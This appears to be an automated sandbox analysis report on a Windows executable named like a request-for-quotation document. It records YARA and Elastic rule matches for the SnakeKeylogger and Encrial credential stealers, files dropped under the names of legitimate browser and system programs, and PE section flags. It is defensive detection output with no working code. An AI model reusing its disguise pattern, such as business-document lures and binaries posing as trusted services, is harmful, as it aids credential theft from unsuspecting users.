Windows Analysis Report
REQUEST FOR QUOTATION 1307-RFQ.exe

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: String function: 00428900 appears 42 times
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: String function: 00420AE3 appears 70 times

Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression

Source: elevation_service.exe0.1.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.1.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.1.dr	Static PE information: Number of sections : 14 > 10
Source: firefox.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: identity_helper.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Number of sections : 11 > 10

Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1670504566.000000000435D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION 1307-RFQ.exe
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1670987417.00000000041B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs REQUEST FOR QUOTATION 1307-RFQ.exe
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1661421191.0000000003E80000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs REQUEST FOR QUOTATION 1307-RFQ.exe
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs REQUEST FOR QUOTATION 1307-RFQ.exe
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1665050092.0000000003E90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs REQUEST FOR QUOTATION 1307-RFQ.exe

Source: REQUEST FOR QUOTATION 1307-RFQ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: REQUEST FOR QUOTATION 1307-RFQ.exe PID: 7292, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7360, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
